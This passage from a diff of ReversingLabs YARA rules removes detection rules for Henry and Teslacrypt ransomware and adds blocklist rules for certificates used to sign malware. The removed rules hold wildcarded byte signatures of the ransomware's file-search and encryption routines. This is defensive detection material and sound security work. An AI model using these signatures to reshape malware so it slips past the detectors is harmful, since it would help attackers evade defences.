-            ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 7B ?? ??
-            ?? ?? 02 7B ?? ?? ?? ?? 8E 69 3F ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 16 0A DE ?? 02 28 ??
-            ?? ?? ?? DC 06 2A
-        }
-		$encrypt_files = {
-            16 0A 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 1E 5B 8D ?? ?? ?? ?? 0C 07 6F ?? ?? ?? ?? 1E
-            5B 8D ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 08 6F ?? ?? ?? ?? 11 ?? 09 6F ?? ?? ??
-            ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 08 8E 69 09 8E 69 58 8D ?? ?? ?? ?? 13 ??
-            08 11 ?? 08 8E 69 28 ?? ?? ?? ?? 09 16 11 ?? 08 8E 69 09 8E 69 28 ?? ?? ?? ?? 11 ?? 04
-            28 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 13 ?? 07 08 09 6F ?? ?? ?? ?? 13 ?? 02
-            19 73 ?? ?? ?? ?? 13 ?? 03 18 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 13 ??
-            11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11
-            ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ??
-            2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F
-            ?? ?? ?? ?? DC 17 0A DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "62:1e:69:6c:3a:63:71:e7:7a:67:8c:bf:0e:e3:4a:b2" and 1467072000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Henry : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Henry ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "63627f2b-3205-5790-ba97-8e0d1da39d7c"
-		date = "2021-06-14"
-		modified = "2021-06-14"
+		id = "333a0901-21e7-5b4a-8daa-6a04fc2c4e86"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Henry.yara#L1-L80"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15242-L15258"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e6ab2a8a344d40407118e29ff78f5a0144f42a0fbdee19a80b341b59f056d292"
+		logic_hash = "54ca9b19adfc9357a3fb74f0670ad929319c4d06a7de7ae400f8285a31052276"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Henry"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            02 6F ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 06 8E 69 32 ?? 02 6F ?? ?? ?? ?? 0D 16 0B 38 ?? ??
-            ?? ?? 09 07 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? D4 8D
-            ?? ?? ?? ?? 13 ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 26 6F ?? ?? ?? ?? 11 ?? 6F ??
-            ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 18 18 73 ?? ?? ?? ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 09 8E 69 3F ?? ??
-            ?? ?? 2A
-        }
-		$encrypt_files = {
-            02 8E 2D ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 03 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 7A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 28 ??
-            ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 03 08 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 1F ?? 6F ?? ?? ??
-            ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 25 02 16 02 8E 69 6F ?? ?? ??
-            ?? 25 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
-            25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 FE ?? 09 6F ?? ?? ?? ?? DC 06 2A
-        }
-		$setup_environment = {
-            02 28 ?? ?? ?? ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 02 28 ?? ?? ?? ?? 2A
-        }
-		$init_components = {
-            02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02
-            7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19
-            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ??
-            ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ??
-            ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ??
-            ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02
-            7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ??
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 22 ?? ?? ?? ?? 22 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 02 17 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            02 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 16 28 ?? ?? ?? ?? 02 28 ?? ??
-            ?? ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $setup_environment ) and ( $init_components )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Web Nexus d.o.o." and pe.signatures [ i ] . serial == "21:b9:91" and 1125477041 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Teslacrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Teslacrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "842dae76-573c-564d-b658-ccdda451df21"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "8c362133-a30f-599d-88e0-a1448433178a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Teslacrypt.yara#L1-L665"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15260-L15276"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cc054be68d833d9f29a4ebd1c202922881b0d22a2605edc7def1048dc08f6325"
+		logic_hash = "a2d04275b9fe37308c8f1dca75f4cc3c4a8985930f901e1f46e3ddc2977eea32"
 		score = 75
-		quality = 65
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		quality = 90
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Teslacrypt"
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$file_search_0_3_1_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B5 01 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? 0F 85 89 01 00 00 F6 44 24 ?? ?? 0F 84 D2 00 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
-            1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84
-            29 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83
-            C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 EA 00 00 00 56 8D 94 24 ?? ?? ?? ?? 68
-        }
-		$file_search_0_3_1_2 = {
-            52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 7E FE FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ??
-            50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ??
-            85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB
-            11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ??
-            0F 84 6A FE FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$file_search_0_3_3_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 57 02 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? 0F 85 2B 02 00 00 F6 44 24 ?? ?? 0F 84 74 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
-            1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84
-            CB 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83
-            C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 8C 01 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            52 E8 ?? ?? ?? ?? 8B C6 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52
-        }
-		$file_search_0_3_3_2 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51
-            ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E8 00 00 00 8D 8C 24 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB
-            05 1B C0 83 D8 ?? 85 C0 0F 84 A9 00 00 00 8D 84 24 ?? ?? ?? ?? 57 50 E8 DC FD FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44
-            24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ??
-            ?? EB 11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ??
-            ?? ?? 0F 84 C8 FD FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$file_search_0_3_4a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 57 50 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 57 51 66 89 BC
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F
-            84 99 02 00 00 8B BC 24 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 76 02 00 00 F6 44 24 ?? ?? 0F 84 6B
-            01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 02 00 00 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 1E 02 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D
-            94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            0F 84 AF 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 92 01 00 00 8D 94 24 ?? ??
-            ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 75 01 00 00 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8
-        }
-		$file_search_0_3_4a_2 = {
-            83 C4 ?? 85 C0 0F 84 58 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3B 01
-            00 00 8D 94 24 ?? ?? ?? ?? 57 52 E8 10 FE FF FF 8D 84 24 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? E9 E7 00 00 00 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 79 8D 54
-            24 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 7F 00 00 00 8D 44 24 ?? 50 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 63 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 47 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 35 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB 23 8D
-            4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 10 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24
-            ?? 50 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ?? 0F 84 7D FD FF FF 55 FF 15 ?? ?? ?? ?? 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D
-            33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-		$file_search_0_3_5a_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A
-            ?? 51 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ??
-            52 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 0F 84 91 03 00 00 8B 9C 24 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 84 73 02 00 00 8D 4C
-            24 ?? B8 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2
-            75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 23 03 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 1E
-            66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E3
-            02 00 00 55 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C5 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85
-            C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54
-            24 ?? 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66
-            3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85
-            C0 0F 84 3F 02 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ??
-            75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 00 02 00 00 8D 8C 24 ?? ?? ?? ?? B8
-        }
-		$file_search_0_3_5a_2 = {
-            66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05
-            1B C0 83 D8 ?? 85 C0 0F 84 C1 01 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B
-            50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 82 01 00 00 8D 8C 24 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2
-            75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 43 01 00 00 8D 8C 24 ?? ?? ?? ?? 53 51 E8 0F FD FF FF 8D 94 24 ?? ?? ?? ??
-            52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ED 00 00 00 55 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94
-            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 8D 44 24 ?? 0F 84 79 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 78 00 00 00 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
